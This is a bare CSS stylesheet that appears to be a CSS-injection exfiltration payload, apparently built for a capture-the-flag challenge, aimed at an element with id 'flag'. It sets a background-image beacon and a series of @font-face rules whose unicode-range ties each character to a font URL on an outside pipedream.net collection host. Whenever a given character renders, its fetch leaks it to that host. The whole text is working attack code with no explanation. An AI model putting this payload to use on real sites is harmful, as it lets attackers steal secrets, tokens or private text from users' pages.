body{background-image:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=W40')}
#page{content-visibility:hidden;animation:unveil 0.001s 0.3s forwards}
@keyframes unveil{to{content-visibility:visible}}
#flag{display:block!important}
#flag{font-family:p97w40,p98w40,p106w40,p112w40,p115w40,p121w40,p122w40,p48w40,p49w40,p52w40,p53w40,p55w40,p125w40,monospace;width:40ch;white-space:pre-wrap;word-break:break-all;overflow:visible}
#flag::first-line{font-family:monospace!important}
@font-face{font-family:p97w40;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=a_W40');unicode-range:U+0061}
@font-face{font-family:p98w40;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=b_W40');unicode-range:U+0062}
@font-face{font-family:p106w40;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=j_W40');unicode-range:U+006A}
@font-face{font-family:p112w40;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=p_W40');unicode-range:U+0070}
@font-face{font-family:p115w40;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=s_W40');unicode-range:U+0073}
@font-face{font-family:p121w40;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=y_W40');unicode-range:U+0079}
@font-face{font-family:p122w40;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=z_W40');unicode-range:U+007A}
@font-face{font-family:p48w40;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=0_W40');unicode-range:U+0030}
@font-face{font-family:p49w40;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=1_W40');unicode-range:U+0031}
@font-face{font-family:p52w40;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=4_W40');unicode-range:U+0034}
@font-face{font-family:p53w40;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=5_W40');unicode-range:U+0035}
@font-face{font-family:p55w40;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=7_W40');unicode-range:U+0037}
@font-face{font-family:p125w40;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=%7D_W40');unicode-range:U+007D}